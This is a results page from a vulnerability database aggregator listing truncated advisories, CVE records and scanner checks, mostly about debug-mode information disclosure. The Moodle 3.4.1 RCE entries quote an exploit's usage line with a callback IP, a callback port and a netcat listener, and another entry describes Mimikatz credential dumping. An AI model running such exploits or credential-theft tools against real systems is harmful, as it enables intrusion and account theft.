8320 matches found

Hacker One
added 2019/04/02 2:27 p.m. · 65 views

Mail.ru: [special.mail.ru] Information Disclosure

special.mail.ru was running misconfigured Laravel in debug mode, disclosing some sensitive information...

AI score 0.7
Exploits 0
OSV
added 2019/04/02 11:3 a.m. · 4 views

OPENSUSE-SU-2019:1111-1 Security update for openwsman

This update for openwsman fixes the following issues: Security issues fixed: - CVE-2019-3816: Fixed a vulnerability in openwsmand daemon which could lead to arbitrary file disclosure bsc1122623. - CVE-2019-3833: Fixed a vulnerability in processconnection which could allow an attacker to trigger an...

CVSS 7.5 · AI score 7.5 · EPSS 0.00961
Exploits 0 · References 5
OPENSUSE Linux
added 2019/04/02 12:0 a.m. · 120 views

Security update for openwsman (important)

openSUSE Security Update: Security update for openwsman Announcement ID: openSUSE-SU-2019:1111-1 Rating: important References: 1092206 1122623 Cross-References: CVE-2019-3816 CVE-2019-3833 Affected Products: openSUSE Leap 15.0 An update that fixes two vulnerabilities is now available. Description...

CVSS 7.5 · AI score 8.1 · EPSS 0.00961
Exploits 0 · References 2
Kitploit
added 2019/04/01 8:37 p.m. · 149 views

Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I've made to learn C and make some experiments with Windows security. It's now well known to extract plaintext passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. But that's not all!...

AI score 7.4
Exploits 0 · References 6
OSV
added 2019/03/26 6:29 p.m. · 45 views

PYSEC-2019-78

A vulnerability was found in ceilometer before version 12.0.0.0rc1. An Information Exposure in ceilometer-agent prints sensitive configuration data to log files without DEBUG logging being activated...

CVSS 7.8 · AI score 2.9 · EPSS 0.00115
Exploits 0 · References 3
OSV
added 2019/03/26 6:29 p.m. · 12 views

PYSEC-2019-8

A vulnerability was found in ceilometer before version 12.0.0.0rc1. An Information Exposure in ceilometer-agent prints sensitive configuration data to log files without DEBUG logging being activated...

CVSS 7.8 · AI score 2.9 · EPSS 0.00115
Exploits 0 · References 2
Veracode
added 2019/03/25 8:40 a.m. · 27 views

Cross-Site Scripting (XSS)

Apache ActiveMQ is vulnerable to cross-site scripting (XSS). A remote attacker is able to inject arbitrary JavaScript into a victim's browser via the refresh parameter to PortfolioPublishServlet.java, and through debug logs or subscribe messages in webapp/websocket/chat.js...

CVSS 4.3 · AI score 8.6 · EPSS 0.02575
Exploits 1 · References 6 · Affected Software 1
Tenable Nessus
added 2019/03/25 12:0 a.m. · 10 views

WordPress Debug Mode

The web server on the remote host allows read access to WordPress debug file /wp-content/debug.log which contains debugging information such as PHP notices, warnings and errors. That means WordPress debug mode is enabled or if disabled log file has not been deleted. A remote attacker can exploit...

AI score 7.2
Exploits 0 · References 1
NVD
added 2019/03/21 4:0 p.m. · 13 views

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

CVSS 7 · AI score 6.8 · EPSS 0.00133
Exploits 0 · References 3
OSV
added 2019/03/21 4:0 p.m. · 1 views

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

CVSS 7 · AI score 5.8 · EPSS 0.00133
Exploits 0 · References 3
Prion
added 2019/03/21 4:0 p.m. · 12 views

Design/Logic Flaw

DISPUTED An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a...

CVSS 1.9 · AI score 6.7 · EPSS 0.00133
Exploits 0 · References 1 · Affected Software 1
OSV
added 2019/03/20 9:29 a.m. · 4 views

SUSE-SU-2019:0654-1 Security update for openwsman

This update for openwsman fixes the following issues: Security issues fixed: - CVE-2019-3816: Fixed a vulnerability in openwsmand daemon which could lead to arbitrary file disclosure bsc1122623. - CVE-2019-3833: Fixed a vulnerability in processconnection which could allow an attacker to trigger an...

CVSS 7.5 · AI score 7.4 · EPSS 0.00961
Exploits 0 · References 5
Exploit DB
added 2019/03/19 12:0 a.m. · 69 views

Microsoft VBScript - VbsErase Memory Corruption

r eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44 eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 VBSCRIPT!VbsErase+0x5a: 6e0fc9fa 8b3e mov edi,dword ptr esi ds:002b:13371337=????????...

AI score 7.4
Exploits 0
Vulnrichment
added 2019/03/18 8:9 p.m. · 11 views

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

AI score 6.8 · EPSS 0.00133
Exploits 0 · References 3
Cvelist
added 2019/03/18 8:9 p.m. · 15 views

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

AI score 6.8 · EPSS 0.00133
Exploits 0 · References 3
CVE
added 2019/03/18 8:9 p.m. · 39 views

CVE-2018-18466

CVE-2018-18466 affects SecurEnvoy SecurAccess 9.3.502. When Debug mode is enabled and used for RDP, the emergency credentials are logged in cleartext in the DEBUG folder, exposing them to anyone with access. Root cause: logging of sensitive credentials in cleartext during debugging/debug logs; ve...

CVSS 7 · AI score 6.8 · EPSS 0.00133
Exploits 0 · References 3 · Affected Software 1
Positive Technologies
added 2019/03/18 12:0 a.m. · 3 views

PT-2019-9594 · Microsoft +1 · Windows +1

Name of the Vulnerable Software and Affected Versions: SecurEnvoy SecurAccess version 9.3.502 Description: An issue was discovered in SecurEnvoy SecurAccess. When put in Debug mode and used for RDP connections, the application stores emergency credentials in cleartext in the logs, which can be...

CVSS 7 · AI score 6.7 · EPSS 0.00133
Exploits 0 · References 6
0day.today
added 2019/03/15 12:0 a.m. · 1630 views

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...

CVSS 6.5 · AI score 8.8 · EPSS 0.40785
Exploits 5
Packet Storm
added 2019/03/15 12:0 a.m. · 112 views

Moodle 3.4.1 Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

CVSS 6.5 · AI score 8.8 · EPSS 0.40785
Exploits 5
Tenable Nessus
added 2019/03/08 12:0 a.m. · 23 views

Amazon Linux 2 : bind (ALAS-2019-1170)

Crash from assertion error when debug log level is 10 and log entries meet buffer boundary. This flaw appears to be exploitable only when debug logging is enabled and set to at least a level of 10. As this configuration should be rare in production instances of bind, it is unlikely that most...

CVSS 7.5 · AI score 6.5 · EPSS 0.01301
Exploits 0 · References 2